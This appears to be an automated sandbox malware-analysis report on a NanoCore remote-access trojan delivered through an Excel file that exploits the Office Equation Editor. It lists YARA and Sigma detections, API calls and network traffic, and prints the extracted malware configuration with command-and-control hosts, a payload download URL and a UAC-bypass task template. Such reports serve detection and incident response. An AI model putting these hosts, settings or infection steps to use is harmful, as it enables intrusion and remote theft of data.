13.2.RegSvcs.exe.2d0000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
6.2.RegSvcs.exe.34b48cd.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x241f8:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x24225:$x2: IClientNetworkHost
6.2.RegSvcs.exe.34b48cd.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x241f8:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x252d3:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x24212:$s5: IClientLoggingHost
6.2.RegSvcs.exe.34b48cd.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Click to see the 104 entries

Sigma Overview

AV Detection:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 2780, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 97.107.138.110, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2804, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2804, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\asdERTYgh56F[1].exe

E-Banking Fraud:

Sigma detected: NanoCore

Show sources

Source: File created

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2804, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2860

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Show sources

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp, ParentImage: C:\Users\user\33920049\mmuiqlcvwo.pif, ParentProcessId: 2516, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 2780

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Sigma detected: Possible Applocker Bypass

Show sources

Source: Process started

Author: juju4: Data: Command: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentCommandLine: 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp, ParentImage: C:\Users\user\33920049\mmuiqlcvwo.pif, ParentProcessId: 2516, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 2780

Stealing of Sensitive Information:

Sigma detected: NanoCore

Show sources

Source: File created

Remote Access Functionality:

Sigma detected: NanoCore

Show sources

Source: File created

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR

Found malware configuration

Show sources

Source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "c213d282-998c-4a04-8f80-944681ca", "Group": "nano stub", "Domain1": "ezeani.duckdns.org", "Domain2": "194.5.98.48", "Port": 8338, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Virustotal: Detection: 27%			Perma Link
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	ReversingLabs: Detection: 32%

Source: 6.2.RegSvcs.exe.ae0000.4.unpack	Avira: Label: TR/NanoCore.fadte
Source: 6.2.RegSvcs.exe.340000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 13.2.RegSvcs.exe.2d0000.0.unpack	Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 97.107.138.110:443 -> 192.168.2.22:49166 version: TLS 1.2

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: vbc.exe, 00000004.00000000.447066106.0000000000292000.00000002.00020000.sdmp, vbc.exe.2.dr
Source:	Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdbegSvcs.pdb source: RegSvcs.exe, 00000006.00000002.666190763.000000000083D000.00000004.00000020.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000D.00000002.536198075.0000000000DA2000.00000020.00020000.sdmp, RegSvcs.exe.5.dr

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026A2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	4_2_0026A2DF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027AFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	4_2_0027AFB9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00289FD3 FindFirstFileExA,	4_2_00289FD3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE399B GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00FE399B
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFBCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	5_2_00FFBCB3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01002408 FindFirstFileW,Sleep,FindNextFileW,FindClose,	5_2_01002408
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00FF280D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01028877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	5_2_01028877
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE1A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00FE1A73
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0100CAE7 FindFirstFileW,FindNextFileW,FindClose,	5_2_0100CAE7
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0100DE7C FindFirstFileW,FindClose,	5_2_0100DE7C
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFBF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_00FFBF17

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 97.107.138.110:80

Source: global traffic

DNS query: name: demopicking.renova-sa.net

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 97.107.138.110:443

Networking:

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: ezeani.duckdns.org

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: ezeani.duckdns.org
Source: Malware configuration extractor	URLs: 194.5.98.48

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic	HTTP traffic detected: GET /asdERTYgh56F.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: demopicking.renova-sa.net
Source: global traffic	HTTP traffic detected: GET /asdERTYgh56F.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: demopicking.renova-sa.netConnection: Keep-Alive

Source: Joe Sandbox View	ASN Name: DANILENKODE DANILENKODE
Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS

Source: Joe Sandbox View

IP Address: 194.5.98.48 194.5.98.48

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 194.5.98.48:8338

Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/Timestamping1.crl0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0N
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: mmuiqlcvwo.pif, 00000005.00000002.666654547.0000000002F70000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.667678750.0000000005C00000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666152649.0000000001C10000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666694262.0000000003150000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://secure.globalsign.net/cacert/ObjectSign.crt09
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://secure.globalsign.net/cacert/PrimObject.crt0
Source: mmuiqlcvwo.pif, 00000005.00000002.666654547.0000000002F70000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.667678750.0000000005C00000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666152649.0000000001C10000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666694262.0000000003150000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://www.globalsign.net/repository/0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://www.globalsign.net/repository/03
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://www.globalsign.net/repository09
Source: asdERTYgh56F[1].htm.2.dr	String found in binary or memory: https://demopicking.renova-sa.net/asdERTYgh56F.exe

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4E77D3E.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: demopicking.renova-sa.net

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FF2285 InternetQueryDataAvailable,InternetReadFile,

5_2_00FF2285

Source: global traffic	HTTP traffic detected: GET /asdERTYgh56F.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: demopicking.renova-sa.net
Source: global traffic	HTTP traffic detected: GET /asdERTYgh56F.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: demopicking.renova-sa.netConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown

HTTPS traffic detected: 97.107.138.110:443 -> 192.168.2.22:49166 version: TLS 1.2

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_01006308 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,

5_2_01006308

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0100A0FC OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

5_2_0100A0FC

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0101D91D OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

5_2_0101D91D

Source: RegSvcs.exe, 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0102C7D6 SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

5_2_0102C7D6

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY
